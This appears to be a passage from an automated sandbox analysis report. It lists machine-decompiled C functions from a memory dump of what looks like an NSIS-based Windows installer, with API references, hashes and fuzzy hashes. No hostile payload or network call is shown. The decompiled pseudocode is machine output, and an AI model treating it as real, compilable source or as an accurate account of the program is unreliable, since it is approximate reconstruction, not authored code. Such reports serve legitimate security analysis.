              • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E00401F84(void* __ebx, void* __eflags) {
              				void* _t27;
              				struct HINSTANCE__* _t30;
              				CHAR* _t32;
              				intOrPtr* _t33;
              				void* _t34;
              
              				_t27 = __ebx;
              				asm("sbb eax, 0x42ecd8");
              				 *(_t34 - 4) = 1;
              				if(__eflags < 0) {
              					_push(0xffffffe7);
              					L15:
              					E00401423();
              					L16:
              					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
              					return 0;
              				}
              				_t32 = E00402A29(0xfffffff0);
              				 *(_t34 + 8) = E00402A29(1);
              				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
              					L3:
              					_t30 = LoadLibraryExA(_t32, _t27, 8);
              					if(_t30 == _t27) {
              						_push(0xfffffff6);
              						goto L15;
              					}
              					L4:
              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
              					if(_t33 == _t27) {
              						E00404EB3(0xfffffff7,  *(_t34 + 8));
              					} else {
              						 *(_t34 - 4) = _t27;
              						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
              							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000);
              						} else {
              							E00401423( *((intOrPtr*)(_t34 - 0x20)));
              							if( *_t33() != 0) {
              								 *(_t34 - 4) = 1;
              							}
              						}
              					}
              					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
              						FreeLibrary(_t30);
              					}
              					goto L16;
              				}
              				_t30 = GetModuleHandleA(_t32);
              				if(_t30 != __ebx) {
              					goto L4;
              				}
              				goto L3;
              			}









              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
              • String ID:
              • API String ID: 2987980305-0
              • Opcode ID: 6714c4503f1adaa9a7def2b486d4f4accadca0070fce7f062c20e8e3e2c0112c
              • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
              • Opcode Fuzzy Hash: 6714c4503f1adaa9a7def2b486d4f4accadca0070fce7f062c20e8e3e2c0112c
              • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E00402336(void* __eax) {
              				void* _t15;
              				char* _t18;
              				int _t19;
              				char _t24;
              				int _t27;
              				intOrPtr _t35;
              				void* _t37;
              
              				_t15 = E00402B1E(__eax);
              				_t35 =  *((intOrPtr*)(_t37 - 0x18));
              				 *(_t37 - 0x34) =  *(_t37 - 0x14);
              				 *(_t37 - 0x38) = E00402A29(2);
              				_t18 = E00402A29(0x11);
              				 *(_t37 - 4) = 1;
              				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42ecd0 | 0x00000002, _t27, _t37 + 8, _t27);
              				if(_t19 == 0) {
              					if(_t35 == 1) {
              						E00402A29(0x23);
              						_t19 = lstrlenA(0x40a440) + 1;
              					}
              					if(_t35 == 4) {
              						_t24 = E00402A0C(3);
              						 *0x40a440 = _t24;
              						_t19 = _t35;
              					}
              					if(_t35 == 3) {
              						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
              					}
              					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
              						 *(_t37 - 4) = _t27;
              					}
              					_push( *(_t37 + 8));
              					RegCloseKey();
              				}
              				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
              				return 0;
              			}











              APIs
              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402374
              • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000), ref: 004023CD
              • RegCloseKey.ADVAPI32(?), ref: 004024B0
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID:
              • API String ID: 1356686001-0
              • Opcode ID: 11898e6dbaa131d38996a6be7a4687239e6c2a1d3939deda226e2690b36420ad
              • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
              • Opcode Fuzzy Hash: 11898e6dbaa131d38996a6be7a4687239e6c2a1d3939deda226e2690b36420ad
              • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E00401D38() {
              				void* __esi;
              				int _t6;
              				signed char _t11;
              				struct HFONT__* _t14;
              				void* _t18;
              				void* _t24;
              				void* _t26;
              				void* _t28;
              
              				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
              				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
              				 *0x40b054 = E00402A0C(3);
              				_t11 =  *((intOrPtr*)(_t28 - 0x18));
              				 *0x40b05b = 1;
              				 *0x40b058 = _t11 & 0x00000001;
              				 *0x40b059 = _t11 & 0x00000002;
              				 *0x40b05a = _t11 & 0x00000004;
              				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
              				_t14 = CreateFontIndirectA(0x40b044);
              				_push(_t14);
              				_push(_t26);
              				E00405B25();
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
              				return 0;
              			}












              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CapsCreateDeviceFontIndirect
              • String ID:
              • API String ID: 3272661963-0
              • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
              • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402BF1(intOrPtr _a4) {
              				long _t2;
              				struct HWND__* _t3;
              				struct HWND__* _t6;
              
              				if(_a4 == 0) {
              					if( *0x420c48 == 0) {
              						_t2 = GetTickCount();
              						if(_t2 >  *0x42ec2c) {
              							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
              							 *0x420c48 = _t3;
              							return ShowWindow(_t3, 5);
              						}
              						return _t2;
              					} else {
              						return E00405F93(0);
              					}
              				} else {
              					_t6 =  *0x420c48;
              					if(_t6 != 0) {
              						_t6 = DestroyWindow(_t6);
              					}
              					 *0x420c48 = 0;
              					return _t6;
              				}
              			}







              APIs
              • DestroyWindow.USER32 ref: 00402C04
              • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
              • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
              • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
              • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
              				long _t22;
              
              				if(_a8 != 0x102) {
              					if(_a8 != 0x200) {
              						_t22 = _a16;
              						L7:
              						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
              							 *0x42a088 = _t22;
              							E00405BC7(0x42a0a0, 0x42f000);
              							E00405B25(0x42f000, _t22);
              							E0040140B(6);
              							E00405BC7(0x42f000, 0x42a0a0);
              						}
              						L11:
              						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
              					}
              					if(IsWindowVisible(_a4) == 0) {
              						L10:
              						_t22 = _a16;
              						goto L11;
              					}
              					_t22 = E00404782(_a4, 1);
              					_a8 = 0x419;
              					goto L7;
              				}
              				if(_a12 != 0x20) {
              					goto L10;
              				}
              				E00403ECF(0x413);
              				return 0;
              			}





              APIs
              • IsWindowVisible.USER32(?), ref: 00404E39
              • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
              • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
              				signed int _t11;
              				int _t14;
              				signed int _t16;
              				void* _t19;
              				CHAR* _t20;
              
              				_t20 = _a4;
              				_t19 = 0x64;
              				while(1) {
              					_t19 = _t19 - 1;
              					_a4 = 0x61736e;
              					_t11 = GetTickCount();
              					_t16 = 0x1a;
              					_a6 = _a6 + _t11 % _t16;
              					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20);
              					if(_t14 != 0) {
              						break;
              					}
              					if(_t19 != 0) {
              						continue;
              					}
              					 *_t20 =  *_t20 & 0x00000000;
              					return _t14;
              				}
              				return _t20;
              			}









              APIs
              • GetTickCount.KERNEL32(00435400,00435400,00434000,00403128,00435000,00435400,00435400,00435400,00435400,00435400,?,004032B8), ref: 004058E0
              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058FA
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: nsa
              • API String ID: 1716503409-2209301699
              • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
              • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405427(CHAR* _a4) {
              				struct _PROCESS_INFORMATION _v20;
              				int _t7;
              
              				0x42c0a8->cb = 0x44;
              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
              				if(_t7 != 0) {
              					CloseHandle(_v20.hThread);
              					return _v20.hProcess;
              				}
              				return _t7;
              			}






              APIs
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
              • CloseHandle.KERNEL32(?), ref: 00405459
              Strings
              • Error launching installer, xrefs: 0040543A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
              • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405813(CHAR* _a4, CHAR* _a8) {
              				int _t10;
              				int _t15;
              				CHAR* _t16;
              
              				_t15 = lstrlenA(_a8);
              				_t16 = _a4;
              				while(lstrlenA(_t16) >= _t15) {
              					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
              					_t10 = lstrcmpiA(_t16, _a8);
              					if(_t10 == 0) {
              						return _t16;
              					}
              					_t16 = CharNextA(_t16);
              				}
              				return 0;
              			}







              APIs
              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
              • CharNextA.USER32(00000000), ref: 00405841
              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
              • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
              Uniqueness

              Uniqueness Score: -1.00%